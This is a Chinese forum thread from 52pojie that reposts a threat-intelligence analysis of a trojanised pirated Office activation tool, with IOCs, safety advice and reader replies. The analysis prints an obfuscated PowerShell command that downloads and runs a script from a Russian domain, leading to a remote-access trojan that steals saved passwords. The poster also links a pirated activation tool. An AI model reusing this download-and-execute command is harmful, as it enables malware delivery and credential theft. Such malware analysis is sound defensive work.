官方bilibiliWindows破解入门Android逆向入门
【网络诊断修复工具】切换到窄版

吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

吾爱破解 - 52pojie.cn»网站 【 病毒分析 】 『病毒分析区』 警惕Office盗版激活工具中隐藏的远程控制木马【搬运】
12345678910... 49下一页
返回列表 发新帖
查看: 61108|回复: 460
收起左侧

[转载] 警惕Office盗版激活工具中隐藏的远程控制木马【搬运】

    [复制链接]
没有星星的夜空
没有星星的夜空 发表于 2019-4-9 08:37
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 没有星星的夜空 于 2019-5-5 16:05 编辑

概述
某讯御见威胁情报中心检测到一款Office激活工具被捆绑传播远程控制木马,该Office激活工具实际经过二次打包,黑客将恶意代码和正常的激活程序打包在资源文件中,当用户运行时,除了激活程序会运行,内置的Powershell恶意代码也会运行。该盗版激活工具会在后台下载远程控制木马运行,木马会搜集敏感信息上传并对电脑进行远程控制。
1.png

黑客将Powershell脚本代码(lnk文件)和真正的激活工具程序同时藏在资源文件中,生成新的“激活工具”,目标用户运行被重新打包的激活程序时,执行恶意脚本代码的lnk文件被释放运行。

资源文件
资源文件中包含的lnk文件信息
2.png

激活工具运行时从资源文件中释放lnk文件:
3.png

Lnk文件执行恶意Powershell脚本代码:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Exec bypass -windo 1 $wM=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4'));sal t $wM;$nXR=((New-Object Net.WebClient)).DownloadString('http://boundertime.ru/pps.ps1');t $nXR

Lnk指向的代码下载执行Powershell脚本:
hxxp://timebound.ug/pps.ps1(或http://boundertime.ru/pps.ps1)
4.png

Powershell脚本运行时,通过FromBase64String解码出PE文件二进制数据,并写入文件C:\Users\Public\xxxx.exe,然后将其作为参数传给Process.start
启动程序
5.png

远程控制木马
下载的C:\Users\Public\xxxx.exe为远程控制木马,会搜集浏览器、邮箱、Skype、Telegram、Steam等软件的登录密码上传至C2地址,并接收执行返回的指令,对目标电脑进行远程控制。
6.png

发送搜集的数据至C2地址hxxp://ghjgfjhjgf.ru/index.php
7.png

安全建议
1、使用正版软件,尽量不要使用激活、破解工具。
2、不要运行来历不明的程序。
3、使用电XX家拦截该类木马攻击。
8.png
IOCs

MD5
2fc6dd175a2288a9c2bed36969e3241d
0c638e0c02e0d1c2a2eb7429a51e13b0
a5898f7aae5d6212fac6447bf801ecc1
eb5b534366f0831b3842abac17346cd5
171a6a149d36d8be2f9d4b35c25a8ec4
03a1845d78da4d5d40ffa6cb3892ce0c
ca21c7ae0664b9b5dc24710b0221d4f4
006f03b07fe27eaf4ab4a866a02dc5dd
d343f4179b00f1f3b2ab7b942648b0c2
10e7859d0dfabae2eebc9605e40612f2
05861babd099e81990cfda340de5de01
4e5b4bc27cad9891c1d11ff6ee1b3581
82b313ceef47bf9aa18e3e0946fca773

IP
92.53.120.114
31.177.78.16

Domain
boundertime.ru
timebound.ug
ghjgfjhjgf.ru

URL
hxxp://timebound.ug/pps.ps1
hxxp://boundertime.ru/pps.ps1
hxxp://ghjgfjhjgf.ru/index.php

动动小手,免费评分走一波

我自己用的这个还可以吧
论坛内也有好多的
链接:https://pan.baidu.com/s/1uncSk4EsUzbputHIIZ5b-w 密码:2mz0
没看版本是啥


论坛里有最新发布的,应该比我的新一点
https://www.52pojie.cn/thread-915743-1-1.html

@迷失自我 我不会点评呀,而且每小时只能发10条,只能在这里说明一下了
9.jpg

点评

迷失自我
有不带木马的激活工具的老铁分享一下,点评取等候。。。  发表于 2019-4-9 08:57

免费评分

参与人数 217吾爱币 +186 热心值 +194 收起 理由
liubinzb123 + 1 热心回复!
13697i + 1 热心回复!
kang1314 + 1 + 1 谢谢@Thanks!
清炒藕片丶 + 1 + 1 之前还真下载过英文版的,使用管家就能搞定吗?
Mr.L529042671 + 1 + 1 用心讨论,共获提升!
vb9803 + 1 + 1 我很赞同!
Black-Beauty + 1 + 1 用心讨论,共获提升!
随feng飞扬 + 1 + 1 热心回复!
testonly0531 + 1 谢谢@Thanks!
lhl421 + 1 + 1 鼓励转贴优秀软件安全工具和文档!
fbgnhm110 + 1 + 1 谢谢@Thanks!
AlexAn + 1 我很赞同!
darkbluecs + 1 + 1 谢谢@Thanks!
niugle + 1 我很赞同!
jamiedame + 1 我很赞同!
Mr.Mlwareson_V + 1 + 1 鼓励转贴优秀软件安全工具和文档!
jiang3986633 + 1 + 1 谢谢@Thanks!
ameise + 1 + 1 我很赞同!
灬酱油党 + 1 + 1 鼓励转贴优秀软件安全工具和文档!
泠月酱 + 1 + 1 谢谢@Thanks!
ymd + 1 谢谢@Thanks!
XenProject + 1 + 1 用心讨论,共获提升!
zgcwkj + 1 + 1 鼓励转贴优秀软件安全工具和文档!
52user + 1 + 1 用心讨论,共获提升!
joyu610 + 1 我很赞同!
嗜血天下0 + 1 + 1 我很赞同!
uai1314 + 1 + 1 谢谢@Thanks!
lxq951 + 1 + 1 用心讨论,共获提升!
维系小冉 + 1 学习了,感谢楼主
路人林 + 1 我很赞同!
QDS123 + 1 + 1 希望这个真的是有用的,以前都不管这些,被你这么一说还真的是一抖一抖的,.
河东奇 + 1 + 1 我很赞同!
风扬起时 + 1 + 1 热心回复!
deva- + 1 + 1 谢谢@Thanks!
庄周梦蝶 + 1 + 1 热心回复!
abc302001 + 1 + 1 谢谢@Thanks!
fengbolee + 1 + 1 谢谢@Thanks!
mozart8341 + 1 + 1 我很赞同!
Zome + 1 谢谢@Thanks!
Dishang + 1 + 1 热心回复!
张啊啊 + 1 + 1 谢谢@Thanks!
shyocean + 1 用心讨论,共获提升!
Zxx_ + 1 + 1 热心回复!
hzyh + 1 + 1 我很赞同!
uriel.you + 1 + 1 我很赞同!
南飞-鹿~ + 1 谢谢@Thanks!
十三叔 + 1 + 1 我很赞同!
小心110 + 1 谢谢@Thanks!
清火胶囊 + 1 + 1 用心讨论,共获提升!
浅笑如昔丶 + 1 之前就是论坛里下载了一个,支付宝被远程了2万多。还好有保险赔
游隼89 + 1 + 1 我看不出来。仰望能看出来的/
sylw6919 + 1 + 1 我很赞同!
苏落大神 + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
三行而后思 + 1 + 1 我很赞同!
uiui + 1 + 1 谢谢@Thanks!
欧皇非皇 + 1 + 1 我很赞同!
h45673 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
rainxusky + 1 + 1 我很赞同!
zfzzqlx + 1 + 1 热心回复!
sr_bz + 1 + 1 谢谢@Thanks!
jugexigua + 1 谢谢@Thanks!
MichaelWin + 1 热心回复!
顾忌你11 + 1 + 1 谢谢@Thanks!
Yancy-Lan + 1 谢谢@Thanks!
jljyyjd + 1 我很赞同!
exe19890522 + 1 谢谢@Thanks!
月如梭红尘辗 + 1 谢谢@Thanks!
woditian + 1 + 1 谢谢@Thanks!
minglei526 + 1 + 1 感谢您的宝贵建议,我们会努力争取做得更好!
一变万变 + 1 + 1 楼主发这个帖子有什么用?告诉你有病,不给药,还不说怎么看病
dzpos + 1 + 1 热心回复!
路人点心 + 1 + 1 我很赞同!
皓哥阿 + 1 + 1 谢谢@Thanks!
踽踽独行 + 1 + 1 吓得我赶紧查杀电脑
放嗳自由 + 1 + 1 谢谢@Thanks!
夏520 + 1 + 1 以前没注意过,下次谨慎,打击盗版,坚决不买正版
a764329871 + 1 + 1 我很赞同!
ff0510 + 1 + 1 谢谢@Thanks!
rnwxa + 1 + 1 热心回复!
q245198004 + 1 + 1 谢谢@Thanks!
nakasou + 1 + 1 我很赞同!
zhjgood + 1 + 1 谢谢@Thanks!
pushaojie + 1 + 1 热心回复!
pjavac + 1 + 1 我很赞同!
shanfei + 1 + 1 谢谢@Thanks!
zourongfeng + 1 + 1 谢谢@Thanks!
sfoto2011 + 1 + 1 谢谢@Thanks!
zpp7 + 1 + 1 我很赞同!
lxb + 1 + 1 我很赞同!
973143152 + 1 + 1 热心回复!
游侠dede + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
遇日不归 + 1 + 1 我很赞同!
1000Y + 1 + 1 谢谢@Thanks!
寂寞00侃 + 1 鼓励转贴优秀软件安全工具和文档!
cuteftp + 1 + 1 鼓励转贴优秀软件安全工具和文档!
wjzj + 1 + 1 谢谢@Thanks!
練ppg + 1 + 1 热心回复!
Raylist + 1 热心回复!
树泽 + 1 谢谢@Thanks!
xiaokaic + 1 谢谢@Thanks!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
回复

举报

爱凤凤呦
头像被屏蔽
爱凤凤呦 发表于 2019-4-9 08:41
提示: 作者被禁止或删除 内容自动屏蔽
【吾爱破解论坛总版规】 - [让你充分了解吾爱破解论坛行为规则]
回复 支持 8

举报

没有星星的夜空
 楼主| 没有星星的夜空 发表于 2019-4-9 08:44
吾爱破解论坛没有任何官方QQ群,禁止留联系方式,禁止任何商业交易。
努力的笨蛋 发表于 2019-4-9 08:41
看你的激活工具来源了

嗯,帖子说明了是盗版激活工具

正版激活工具一般都没有的
如何升级?如何获得积分?积分对应解释说明!
回复 支持 2

举报

hhk007
hhk007 发表于 2019-4-9 08:41
《站点帮助文档》有什么问题来这里看看吧,这里有你想知道的内容!
如何发现呢?
呼吁大家发布原创作品添加吾爱破解论坛标识!
回复 支持 2

举报

没有星星的夜空
 楼主| 没有星星的夜空 发表于 2019-4-9 08:48
hhk007 发表于 2019-4-9 08:41
如何发现呢?

说不定就是因为某讯工程师用了激活工具竟然被黑,以至于开始搜寻这事了
如何快速判断一个文件是否为病毒!
回复 支持 2

举报

a2f88
a2f88 发表于 2019-4-9 08:41
不使用破解工具的概率不大啊
回复 支持 1

举报

没有星星的夜空
 楼主| 没有星星的夜空 发表于 2019-4-9 09:50
简单i 发表于 2019-4-9 09:48
用什么软件可以查毒呢

某讯安全管家、36o 都可以的

免费评分

参与人数 1吾爱币 +1 热心值 +1 收起 理由
简单i + 1 + 1 谢谢 谢谢

查看全部评分

回复 支持 1

举报

爱到发烧
爱到发烧 发表于 2019-4-9 08:39
很好的帖子,学习了
回复 支持

举报

努力的笨蛋
努力的笨蛋 发表于 2019-4-9 08:41
看你的激活工具来源了

点评

zaq4736
就是防不胜防啊。有靠谱的来源吗?分享一下呗。  发表于 2019-4-11 18:41
回复 支持

举报

baiqpl0254
头像被屏蔽
baiqpl0254 发表于 2019-4-9 08:43
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持

举报

201411112020
201411112020 发表于 2019-4-9 08:44
谢谢分享!
回复 支持

举报

bricher9988
bricher9988 发表于 2019-4-9 08:44
楼主辛苦了,谢谢分享!!!
回复 支持

举报

下一页 »
12345678910... 49下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则


免责声明:
吾爱破解所发布的一切破解补丁、注册机和注册信息及软件的解密分析文章仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。

Mail To:Service@52pojie.cn

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-24 10:04

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表